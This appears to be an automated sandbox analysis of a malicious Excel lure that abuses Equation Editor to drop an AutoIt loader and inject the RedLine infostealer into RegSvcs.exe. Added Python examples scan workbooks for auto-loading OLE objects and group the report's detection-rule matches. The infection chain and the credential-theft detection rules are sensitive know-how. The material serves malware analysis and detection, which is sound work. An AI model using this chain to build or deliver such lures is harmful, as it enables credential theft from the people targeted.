memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_fc8bf7c3-9
                  Source: OIU.exe.2.dr | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_00ed84c1-5
                  Source: OIU.exe.2.dr | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_ae5f0cf3-4
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\OIU.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\OIU.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\OIU.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\OIU.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\OIU.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\OIU.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C0D5EB: CreateFileW, DeviceIoControl, CloseHandle
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C01201: LogonUserW, DuplicateTokenEx, CloseHandle, OpenWindowStationW, GetProcessWindowStation, SetProcessWindowStation, OpenDesktopW, _wcslen, LoadUserProfileW, CreateEnvironmentBlock, CreateProcessAsUserW, UnloadUserProfile, GetProcessHeap, HeapFree, CloseWindowStation, CloseDesktop, SetProcessWindowStation, CloseHandle, DestroyEnvironmentBlock
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C0E8F6: ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C12046
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BA8060
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C08298
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BDE4FF
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BD676B
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C34873
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BCCAA0
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BACAF0
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BBCC39
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BD6DD9
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BA91C0
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BBB119
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BC1394
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BC1706
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BC781B
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BC19B0
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BA7920
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BB997D
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BC7A4A
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BC7CA7
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BC1C77
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BD9EEE
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C2BE44
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BC1F32
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00113670
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 5_2_001D3670
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 7_2_00153670
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 9_2_00213670
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 11_2_00553670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_004193C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_002ED9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_002ECD90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_002E1030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_002ED0D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_002E0F18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00CF0BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00CF2DF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00D660F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00D62DF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00D69668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00D68849
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00D6BD08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 12_2_00D664B0
Source: Order Request1_5_24.xlam.xlsx | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: String function: 00BC0A30 appears 46 times
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: String function: 00BA9CB3 appears 31 times
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: String function: 00BBF9F2 appears 40 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0040E1D8 appears 44 times
Source: sheet1.xml, type: SAMPLE | Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
Source: 12.2.RegSvcs.exe.37b7770.6.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.RegSvcs.exe.530000.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.RegSvcs.exe.300000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.RegSvcs.exe.300000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.RegSvcs.exe.3766458.7.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.RegSvcs.exe.300ee8.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.RegSvcs.exe.300ee8.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.RegSvcs.exe.b6f2ae.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.RegSvcs.exe.530000.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.RegSvcs.exe.b70196.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.RegSvcs.exe.3766458.7.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.RegSvcs.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.RegSvcs.exe.37b7770.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.RegSvcs.exe.b6f2ae.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.OIU.exe.de0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.OIU.exe.120000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.RegSvcs.exe.b70196.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.OIU.exe.a40000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 7.2.OIU.exe.6e0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.OIU.exe.360000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000003.00000002.457795747.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000005.00000002.460633124.0000000000DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000009.00000002.464011217.0000000000360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000C.00000002.619889469.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000B.00000002.466866889.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000007.00000002.462329527.00000000006E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
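The sheet1.xml match on INDICATOR_XML_LegacyDrawing_AutoLoad_Document at the top of this block, read together with the "OLE stream indicators ... all false" line further up, says the lure is not an OLE2 compound file but an OOXML (zip) workbook whose worksheet carries a legacy drawing plus an OLE object marked to load automatically; that is what hands the embedded Equation Editor object to EQNEDT32.EXE the moment the sheet is rendered, with no macro and no click. The following is an added example for triaging a workbook for that shape; it is not Joe Sandbox's or ditekSHen's code. The minimal worksheet it builds is constructed, the progId "Equation.3" is the ProgID under which Equation Editor 3.0 registers, and the scanner only recognises the document structure, not the EQNEDT32.EXE memory-corruption payload itself, which lives inside the embedded oleObject binary.

```python
"""Added example: scan an OOXML workbook for a worksheet that combines a
<legacyDrawing> with an <oleObject autoLoad="1">. Not Joe Sandbox code;
the sample workbook below is constructed inline so the script runs offline."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS_MAIN = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
# ST_Boolean in OOXML allows both spellings.
AUTOLOAD_TRUE = {"1", "true"}


def local(tag):
    """Strip the namespace prefix ElementTree puts on every tag."""
    return tag.rsplit("}", 1)[-1]


def scan_sheet_xml(xml_bytes):
    """Return the indicators found in one worksheet part.

    iter() walks the whole tree, so an <oleObject> wrapped in
    <mc:AlternateContent>/<mc:Choice> (the usual layout) is still found."""
    root = ET.fromstring(xml_bytes)
    found = {"legacyDrawing": False, "autoload_ole": [], "progids": []}
    for el in root.iter():
        name = local(el.tag)
        if name == "legacyDrawing":
            found["legacyDrawing"] = True
        elif name == "oleObject":
            progid = el.get("progId", "")
            found["progids"].append(progid)
            if el.get("autoLoad", "0").lower() in AUTOLOAD_TRUE:
                found["autoload_ole"].append(progid)
    return found


def scan_workbook(data):
    """Scan every worksheet in an .xlsx given as bytes.

    Returns {part name: indicators} for sheets that have BOTH a legacy
    drawing and an auto-loading OLE object; either alone is not flagged."""
    hits = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if re.fullmatch(r"xl/worksheets/sheet\d+\.xml", name):
                ind = scan_sheet_xml(zf.read(name))
                if ind["legacyDrawing"] and ind["autoload_ole"]:
                    hits[name] = ind
    return hits


# Constructed sample: the smallest worksheet that shows the pattern.
SAMPLE_SHEET = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<worksheet xmlns="{NS_MAIN}" xmlns:r="{NS_REL}">
  <sheetData/>
  <legacyDrawing r:id="rId1"/>
  <oleObjects>
    <oleObject progId="Equation.3" shapeId="1025" r:id="rId2" autoLoad="1"/>
  </oleObjects>
</worksheet>"""

BENIGN_SHEET = f'<worksheet xmlns="{NS_MAIN}"><sheetData/></worksheet>'


def build_sample(sheet_xml=SAMPLE_SHEET):
    """Build an in-memory zip with only the parts the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/worksheets/sheet1.xml", sheet_xml)
    return buf.getvalue()


if __name__ == "__main__":
    print(scan_workbook(build_sample()))
```

Run it against a real file with `scan_workbook(open(path, "rb").read())`. A hit is a triage signal rather than proof of exploitation: a legitimate workbook can embed an auto-loading OLE object, so the next step is to pull `xl/embeddings/oleObject*.bin` and confirm what the object actually is.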
Source: 12.2.RegSvcs.exe.300ee8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.RegSvcs.exe.530000.3.raw.unpack, RsYAkkzVoy.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.RegSvcs.exe.530000.3.raw.unpack, Kqqzixk.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.RegSvcs.exe.530000.3.raw.unpack, xROdzGigX.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.RegSvcs.exe.530000.3.raw.unpack, ywes.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.RegSvcs.exe.530000.3.raw.unpack, iPVW0zV.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 12.2.RegSvcs.exe.530000.3.raw.unpack, 1Pi9sgbHwoV.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.RegSvcs.exe.530000.3.raw.unpack, YUgDfWK2g4.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.RegSvcs.exe.530000.3.raw.unpack, YUgDfWK2g4.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
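The "Matched rule" lines above name their sources in two shapes: unpacked regions such as 12.2.RegSvcs.exe.400000.2.raw.unpack and raw memory dumps such as 0000000C.00000002.619889469.0000000000400000.....sdmp. Read together they tell you where each payload lives: every OIU.exe instance (3, 5, 7, 9, 11) carries RedLine in a mapped region, and RegSvcs.exe (12) carries RedLine at 0x400000 plus the vault-credential indicator in several other regions. The following is an added example, not Joe Sandbox code, that parses such lines into a per-rule view so the pivot is mechanical; the sample lines are copied from this report, the parser accepts both the fused form shown on the page and the "Source: ... | Matched rule: ..." form, and it assumes the unpack names mean process.phase.image.base.index and that the dump names carry the same process number and base in hexadecimal.

```python
"""Added example: aggregate Joe Sandbox 'Matched rule' lines by rule and by
process/region. Not Joe Sandbox code. The field layout of the source names
(process.phase.image.hexbase.index[.raw].unpack and the 8/8/n/16-digit .sdmp
form) is an assumption drawn from the lines in this report."""
import re
from collections import defaultdict

# Constructed input: a subset of the 'Matched rule' lines from this report.
REPORT_LINES = [
    "Source: 12.2.RegSvcs.exe.37b7770.6.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen",
    "Source: 12.2.RegSvcs.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen",
    "Source: 3.2.OIU.exe.120000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen",
    "Source: 11.2.OIU.exe.a40000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen",
    "Source: 0000000C.00000002.619889469.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen",
    "Source: 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen",
    "Source: sheet1.xml, type: SAMPLE | Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen",
]

LINE_RE = re.compile(
    r"Source:\s*(?P<src>.+?),\s*type:\s*(?P<type>\w+).*?Matched rule:\s*(?P<rule>\S+)")
# "<proc>.<phase>.<image>.<hexbase>.<n>[.raw].unpack"  (assumed meaning)
UNPACK_RE = re.compile(
    r"^(?P<pid>\d+)\.(?P<phase>\d+)\.(?P<image>.+?\.exe)\.(?P<base>[0-9a-fA-F]+)\.\d+\.(?:raw\.)?unpack$")
# "<proc hex8>.<phase hex8>.<dump id>.<base hex16>.<more fields>.sdmp"  (assumed meaning)
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.\d+\.(?P<base>[0-9A-Fa-f]{16})\..*\.sdmp$")


def parse_source(src):
    """Map a source descriptor to (kind, process number, image name, base address)."""
    m = UNPACK_RE.match(src)
    if m:
        return ("unpack", int(m["pid"]), m["image"], int(m["base"], 16))
    m = SDMP_RE.match(src)
    if m:
        return ("sdmp", int(m["pid"], 16), None, int(m["base"], 16))
    return ("file", None, src, None)


def summarize(lines):
    """Return {rule: {"regions": ["image:proc@0xbase", ...], "files": [...]}}."""
    parsed = []
    for line in lines:
        m = LINE_RE.search(line)
        if m:
            parsed.append((m["rule"],) + parse_source(m["src"]))
    # Memory dumps only carry the process number; learn number -> image from
    # the unpack entries first so dumps can be attributed to a process too.
    pid_image = {pid: image for _, kind, pid, image, _ in parsed if kind == "unpack"}
    out = defaultdict(lambda: {"regions": set(), "files": set()})
    for rule, kind, pid, image, base in parsed:
        if kind == "file":
            out[rule]["files"].add(image)
        else:
            name = image or pid_image.get(pid, "proc")
            # A region reached both as .unpack and as .sdmp collapses to one entry.
            out[rule]["regions"].add(f"{name}:{pid}@0x{base:x}")
    return {r: {"regions": sorted(v["regions"]), "files": sorted(v["files"])}
            for r, v in out.items()}


if __name__ == "__main__":
    for rule, where in summarize(REPORT_LINES).items():
        print(rule, where)
```

The useful output here is that RegSvcs.exe:12@0x400000 appears once even though the report lists it as both an unpacked PE and a raw dump; that single region, a RedLine match at the default image base of a .NET host process, is the one to carve for the final payload and its configuration.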
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winXLSX@42/18@4/3
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C137B5: GetLastError, FormatMessageW
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C010BF: AdjustTokenPrivileges, CloseHandle
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C016C3: LookupPrivilegeValueW, AdjustTokenPrivileges, GetLastError
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C151CD: SetErrorMode, GetDiskFreeSpaceExW, SetErrorMode
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C2A67C: CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, CloseHandle
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C1648E: _wcslen, CoInitialize, CoCreateInstance, CoUninitialize
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BA42A2: CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource, LockResource
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Order Request1_5_24.xlam.xlsx
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR785A.tmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Order Request1_5_24.xlam.xlsx | Virustotal: Detection: 52%
Source: Order Request1_5_24.xlam.xlsx | ReversingLabs: Detection: 68%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
